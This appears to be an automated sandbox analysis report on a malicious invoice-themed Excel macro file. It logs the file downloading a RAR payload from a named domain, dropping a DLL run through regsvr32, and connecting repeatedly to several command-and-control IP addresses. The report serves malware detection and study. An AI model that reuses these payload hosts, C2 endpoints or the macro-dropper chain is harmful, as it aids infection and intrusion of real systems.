Source: global trafficHTTP traffic detected: GET /d0l359.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: truxiellogroup.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1182D45F.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /d0l359.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: truxiellogroup.comConnection: Keep-Alive
Source: regsvr32.exe, 00000004.00000002.2381998535.00000000006BD000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comvw equals www.linkedin.com (Linkedin)
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000002.2381998535.00000000006BD000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: truxiellogroup.com
Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241078237.0000000000236000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: DWWIN.EXE, 00000007.00000003.2239993090.00000000001B1000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/env
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2245060695.0000000003835000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2382362922.00000000021A0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2245277258.0000000003D60000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2381929162.0000000001CD0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382046788.00000000008F0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241857829.00000000022E0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2382362922.00000000021A0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2245277258.0000000003D60000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2241017725.00000000001D6000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000007.00000002.2244718087.0000000003547000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65/f
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65/t
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2385480217.00000000031AA000.00000004.00000001.sdmpString found in binary or memory: https://46.105.131.65:1512/
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmpString found in binary or memory: https://46.105.131.65:1512/yB
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233/
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233/qM
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmpString found in binary or memory: https://5.100.228.233:3389/YB
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmpString found in binary or memory: https://5.100.228.233:3389/aB
Source: regsvr32.exe, 00000004.00000002.2381998535.00000000006BD000.00000004.00000020.sdmpString found in binary or memory: https://77.220.64.37/
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27/
Source: regsvr32.exe, 00000004.00000002.2382018253.0000000000702000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27/P
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmpString found in binary or memory: https://80.86.91.27:3308/AB
Source: regsvr32.exe, 00000004.00000003.2237540670.00000000031AE000.00000004.00000001.sdmpString found in binary or memory: https://80.86.91.27:3308/IB
Source: regsvr32.exe, 00000004.00000003.2110052097.0000000000703000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2240075334.0000000003899000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 49265 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49345
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49223
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49187
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49341
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
Source: unknownNetwork traffic detected: HTTP traffic on port 49374 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49207 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49313 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49219
Source: unknownNetwork traffic detected: HTTP traffic on port 49233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49337
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49215
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49333
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49211
Source: unknownNetwork traffic detected: HTTP traffic on port 49297 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49297
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49293
Source: unknownNetwork traffic detected: HTTP traffic on port 49333 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 49245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49329
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49207
Source: unknownNetwork traffic detected: HTTP traffic on port 49219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49325
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49203
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49289
Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49321
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
Source: unknownNetwork traffic detected: HTTP traffic on port 49301 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49281
Source: unknownNetwork traffic detected: HTTP traffic on port 49357 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49386 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49321 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49273 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49317
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49313
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49277
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49398
Source: unknownNetwork traffic detected: HTTP traffic on port 49289 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49273
Source: unknownNetwork traffic detected: HTTP traffic on port 49394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49394
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49390
Source: unknownNetwork traffic detected: HTTP traffic on port 49341 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49309
Source: unknownNetwork traffic detected: HTTP traffic on port 49366 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49253 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49349 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49305
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49301
Source: unknownNetwork traffic detected: HTTP traffic on port 49269 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49265
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49386
Source: unknownNetwork traffic detected: HTTP traffic on port 49261 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49370 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49261
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49382
Source: unknownNetwork traffic detected: HTTP traffic on port 49378 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49281 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49237 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49329 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49293 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49257
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49378
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49253
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49374
Source: unknownNetwork traffic detected: HTTP traffic on port 49249 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49370
Source: unknownNetwork traffic detected: HTTP traffic on port 49203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49337 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49241 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49309 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49249
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49245
Source: unknownNetwork traffic detected: HTTP traffic on port 49305 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49366
Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49241
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49362
Source: unknownNetwork traffic detected: HTTP traffic on port 49353 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49277 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49382 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49237
Source: unknownNetwork traffic detected: HTTP traffic on port 49325 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49357
Source: unknownNetwork traffic detected: HTTP traffic on port 49398 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49233
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49199
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49353
Source: unknownNetwork traffic detected: HTTP traffic on port 49285 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
Source: unknownNetwork traffic detected: HTTP traffic on port 49317 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49191
Source: unknownNetwork traffic detected: HTTP traffic on port 49390 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49229 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49257 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49345 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49229
Source: unknownNetwork traffic detected: HTTP traffic on port 49362 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49349
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49183 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49187 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49191 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49195 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49199 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49203 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49207 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49211 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49215 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49219 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49223 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49229 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49233 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49237 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49241 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49245 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49249 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49253 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49257 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49261 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49265 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49269 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49273 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49277 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49281 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49285 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49289 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49293 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49297 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49301 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49305 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49309 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49313 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49317 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49321 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49325 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49329 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49333 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49337 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49341 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49345 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49349 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49353 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49357 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49362 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49366 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49370 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49374 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49378 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49382 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49386 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49390 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49394 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49398 version: TLS 1.2
Source: C:\Windows\System32\DWWIN.EXEFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCCJump to dropped file

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: INV2680371456-20210111889374.xlsmInitial sample: CALL
Source: INV2680371456-20210111889374.xlsmInitial sample: CALL
Source: INV2680371456-20210111889374.xlsmInitial sample: CALL
Source: INV2680371456-20210111889374.xlsmInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\aymakjne.dllJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
